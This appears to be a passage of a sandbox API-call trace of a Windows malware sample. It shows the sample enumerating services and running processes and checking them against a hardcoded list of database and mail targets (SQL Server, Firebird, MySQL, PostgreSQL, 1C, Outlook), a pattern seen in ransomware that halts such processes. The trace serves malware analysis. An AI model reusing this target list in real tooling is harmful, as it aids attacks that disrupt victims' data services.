	[0052.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0052.288] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0052.288] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0052.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0052.288] lstrlenW (lpString="MMCSS") returned 5
	[0052.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0052.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0052.288] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0052.288] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0052.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0052.288] lstrlenW (lpString="MpsSvc") returned 6
	[0052.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0052.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0052.288] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0052.288] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0052.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0052.288] lstrlenW (lpString="Netman") returned 6
	[0052.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0052.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0052.289] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0052.289] lstrlenW (lpString="netprofm") returned 8
	[0052.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0052.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0052.289] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0052.289] lstrlenW (lpString="NlaSvc") returned 6
	[0052.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0052.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0052.289] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0052.289] lstrlenW (lpString="nsi") returned 3
	[0052.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0052.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0052.289] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0052.289] lstrlenW (lpString="PcaSvc") returned 6
	[0052.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0052.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0052.289] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0052.289] lstrlenW (lpString="PlugPlay") returned 8
	[0052.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0052.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0052.289] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0052.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0052.289] lstrlenW (lpString="Power") returned 5
	[0052.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0052.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0052.290] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0052.290] lstrlenW (lpString="ProfSvc") returned 7
	[0052.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0052.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0052.290] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0052.290] lstrlenW (lpString="RpcEptMapper") returned 12
	[0052.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0052.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0052.290] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0052.290] lstrlenW (lpString="RpcSs") returned 5
	[0052.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0052.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0052.290] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0052.290] lstrlenW (lpString="SamSs") returned 5
	[0052.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0052.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0052.290] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0052.290] lstrlenW (lpString="Schedule") returned 8
	[0052.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0052.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0052.290] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0052.290] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0052.291] lstrlenW (lpString="SENS") returned 4
	[0052.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0052.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0052.291] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0052.291] lstrlenW (lpString="ShellHWDetection") returned 16
	[0052.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0052.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0052.291] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0052.291] lstrlenW (lpString="Spooler") returned 7
	[0052.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0052.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0052.291] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0052.291] lstrlenW (lpString="swprv") returned 5
	[0052.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0052.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0052.291] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0052.291] lstrlenW (lpString="SysMain") returned 7
	[0052.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0052.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0052.291] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0052.291] lstrlenW (lpString="Themes") returned 6
	[0052.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0052.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0052.291] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0052.292] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0052.292] lstrlenW (lpString="TrkWks") returned 6
	[0052.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0052.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0052.292] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0052.292] lstrlenW (lpString="UxSms") returned 5
	[0052.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0052.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0052.292] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0052.292] lstrlenW (lpString="VSS") returned 3
	[0052.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0052.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0052.292] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0052.292] lstrlenW (lpString="WdiServiceHost") returned 14
	[0052.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0052.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0052.292] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0052.292] lstrlenW (lpString="WdiSystemHost") returned 13
	[0052.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0052.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0052.292] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0052.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0052.292] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0052.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0052.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0052.293] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0052.293] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0052.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0052.293] lstrlenW (lpString="Winmgmt") returned 7
	[0052.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0052.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0052.293] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0052.293] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0052.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0052.293] lstrlenW (lpString="WPDBusEnum") returned 10
	[0052.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0052.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0052.293] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0052.293] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0052.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0052.293] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb54b838 | out: hHeap=0x7d60000) returned 1
	[0052.293] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0
	[0052.295] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0052.296] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0052.296] lstrlenW (lpString="System") returned 6
	[0052.296] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0052.296] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0052.296] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0052.296] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0052.296] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0052.296] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0052.296] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0052.296] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0052.297] lstrlenW (lpString="smss.exe") returned 8
	[0052.297] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0052.297] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0052.297] lstrlenW (lpString="csrss.exe") returned 9
	[0052.297] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0052.297] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0052.297] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0052.297] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0052.297] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0052.297] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0052.297] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0052.298] lstrlenW (lpString="wininit.exe") returned 11
	[0052.298] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0052.298] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0052.298] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0052.298] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0052.299] lstrlenW (lpString="csrss.exe") returned 9
	[0052.299] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0052.299] lstrlenW (lpString="winlogon.exe") returned 12
	[0052.299] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0052.300] lstrlenW (lpString="services.exe") returned 12
	[0052.300] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0052.300] lstrlenW (lpString="lsass.exe") returned 9
	[0052.300] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0052.300] lstrlenW (lpString="lsm.exe") returned 7
	[0052.301] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.301] lstrlenW (lpString="svchost.exe") returned 11
	[0052.301] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.301] lstrlenW (lpString="svchost.exe") returned 11
	[0052.301] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.302] lstrlenW (lpString="svchost.exe") returned 11
	[0052.302] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.302] lstrlenW (lpString="svchost.exe") returned 11
	[0052.302] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.303] lstrlenW (lpString="svchost.exe") returned 11
	[0052.303] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0052.303] lstrlenW (lpString="audiodg.exe") returned 11
	[0052.303] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.304] lstrlenW (lpString="svchost.exe") returned 11
	[0052.304] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.304] lstrlenW (lpString="svchost.exe") returned 11
	[0052.304] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0052.305] lstrlenW (lpString="dwm.exe") returned 7
	[0052.305] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0052.305] lstrlenW (lpString="explorer.exe") returned 12
	[0052.305] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0052.306] lstrlenW (lpString="spoolsv.exe") returned 11
	[0052.306] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0052.306] lstrlenW (lpString="taskhost.exe") returned 12
	[0052.306] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.307] lstrlenW (lpString="svchost.exe") returned 11
	[0052.307] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0052.307] lstrlenW (lpString="taskeng.exe") returned 11
	[0052.307] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0052.308] lstrlenW (lpString="taskhost.exe") returned 12
	[0052.308] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0052.308] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0052.308] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0052.308] lstrlenW (lpString="python tragedy.exe") returned 18
	[0052.309] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0052.309] lstrlenW (lpString="talent-mastercard.exe") returned 21
